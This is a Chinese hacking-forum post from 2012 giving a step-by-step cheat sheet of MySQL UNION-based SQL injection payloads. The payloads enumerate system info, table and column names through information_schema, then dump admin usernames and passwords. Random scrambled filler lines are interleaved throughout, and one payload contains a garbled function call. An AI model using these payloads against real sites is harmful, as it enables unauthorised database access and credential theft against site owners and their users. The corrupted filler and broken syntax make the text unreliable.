中国网络渗透测试联盟
标题:
mysql常规注入
[打印本页]
作者:
admin
时间:
2012-9-13 17:48
标题:
mysql常规注入
本文介绍MYSQL盲注的一些语句和方法
' } }4 s0 l+ O. [$ ]% D
/ X( X: W* i3 T+ \+ w0 `
学习盲注前先了解下 IFORMATION_SCHEMA 库
2 {2 m5 d' u3 j! h& R8 o* w
8 ^3 i, n; l4 y Y' g6 s- [* ?
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有
9 N- h. K! u( M" ~- r* X, w$ W: l! K
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。
! V. r2 r" F0 X1 H; r
1.得到所有数据库名:
0 R0 U5 b& J! ~6 s' e
|SCHEMATA ->存储数据库名的表
" u% z ~& P) d; h) l
|---字段:SCHEMA_NAME ->数据库名称
l8 U" N% X* E) m* o# Q$ d
, ^2 u/ L1 o9 Z% a. {
|TABLES ->存储表名
* \& v! s9 h4 C' w
|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名
/ v& B* f: F* _( l( ?0 m
|---字段:TABLE_NAME ->存储表的表名
E# A* w2 Q* Y1 S$ c7 S
3 C0 L% @' P1 b8 C( @ V) t
|COLUMNS ->存储的字段名表
) M5 N- ~2 E- X4 k' a) [7 m
|---字段:TABLE_SCHEMA ->该字段所属数据库名
, t q4 K6 q' ^9 }& A& n
|---字段:TABLE_NAME ->存储所属表的名称
5 c! c. L# Y( ~
+ J1 T$ P }: {4 B+ t0 V7 r% f
|---字段:COLUMN_NAME ->该字段的名称
7 E* H* u5 P8 Q' N
9 z$ F, `' }9 S" S% `5 j8 e
' l; P& a, H4 ]% b; [
$ t! R0 x# I& H# d& A2 |
###########################################################################
* x8 K6 I3 P, m4 R2 l
/ J, E! [& t; W
0x001 获取系统信息:
J j' Y4 M' n0 U; D: I9 h/ d
+ t, z. a. L$ W# X8 Y
union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
, H" V% P( B4 E5 D
. p4 O; z$ k4 K% j. X, r# O
/*
* ?1 o$ E1 f+ d# v* f; p
1 l" `9 g. c" I7 o7 e8 p/ B
@@global.version_compile_os 获取系统版本
7 k% V( E1 ?+ i% H; f! H" L, j7 W7 H
8 E: X- j G" A9 t% K; m
@@datadir 数据库路径
) n: g6 @4 ~) q/ s4 x2 h
database() 当前数据库名称
' }! e. c- m' E. D' V
0x3c62723e 换行HEX值
3 }; S H8 Y- b
! \& n H% S6 t, R' @9 y; C
*/
- P) i& k) S& A7 ?, q
1 D3 k9 e3 ~- c. m4 u* z
# A* j" n( d0 B4 k" i* W- v
# m" I5 Q7 _5 w& R3 w! Y' n
######################################################################
/ w- Z% n, q% R" d
; L* c# w# z9 X4 v5 F: n
0x002 获取表名
6 U- T8 m" Z0 r& h
$ I. w! W/ r- g6 l. ]+ e. O! m P, g
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
6 J- E; H0 r( [- h0 U5 e t
, v& ^& `1 t9 F, v6 y5 P1 x, y) E
4 G) x2 f( W5 R \
8 N( ?, a" @1 |% K! {% Z) N
/*
) }+ |4 Z) v) f. j
4 R; Z9 G( t, R1 N' m& P3 T
0x67617264656e 为当前数据库名
$ {" @7 R* R! A" U( F7 A( m
; }9 u0 D- a3 t
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名
0 z" _2 [, l9 _5 E8 Z* {1 v$ A- l
. n7 ?( y* R$ g2 E w+ L. a6 v
*/
" e3 ~+ e5 {; L$ r4 S& u# f K* y
% W7 n; j( p# n) [
######################################################################
# d1 r2 r% ^9 a$ q3 f9 e' E
2 R5 o+ m) h7 Y+ d- v4 p7 S
( _+ C- h& v. h' C7 f
" p5 f+ B8 g' r: p- K# a$ C
0x003 获取字段
' K* o( ~( X- q3 T3 e; M# |
" d0 G( i. d5 x3 @0 t: U: \" U* o Q
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
* v N, k5 \8 [# m* m
- Q3 C& m) g! U7 L4 v5 g
/*
4 c' g$ z& |5 J. v. b! {5 J1 m4 D
' k/ y- b3 u% C! S" D7 D B3 I
group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段
. d0 N* W" t* ]/ }: J. ]
* Y; u3 E! c, N7 P) M
0x61646d696e ->选择一个表
. z" p. Q- k! T2 v5 ]
9 p; [+ d1 K1 L4 X1 D: L
0x67617264656e ->数据库名
0 ]% W9 | Y I L7 \2 E) y
& ?( R; q0 r5 H- \1 @* E
*/
- ?+ Q! T% a- A7 J. H
8 U9 r$ E1 p: _7 V H
#####################################################################
$ F. P- C+ f2 U
8 x/ @" ]0 s7 i3 P! v
" h G* n7 Z4 f6 P% h
. [; m5 ]& }& ^1 F0 y4 d( r
0x004 获取数据
: E; x0 k0 S4 L1 o; `. v* \ _: C
i' T9 P4 C) \" z: c. ]
union select 1,2,3
* t6 Y D0 V( _6 e& |/ r9 t
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
" l& A, F% I- u: v6 |
: Z1 S+ c+ M2 y# u9 N& A/ n
union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
2 ]* G: t1 x: o- \# F$ h0 G
) ~& H" ?5 W8 m# s2 u
( o- z. f. w# r; J8 y# }9 B6 F
3 G* F0 V) R+ z! I2 ]! B! `
/*
& U. a9 r L* w. W; y+ w% h; U
}8 r. ?& v; N5 l7 k8 {9 l& a
0x3c62723e 换行符号HEX编码
$ R2 }$ |, p" r, y
) y/ r! D3 z# L% [6 q& m* x, d
group_concat 同时获得该字段所有数据
2 E; e* |. L, `! c
: p% V! g, ~( W& q
*/
9 a# a% v6 k0 B: C
3 @+ J. d2 K X' b5 G4 P
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2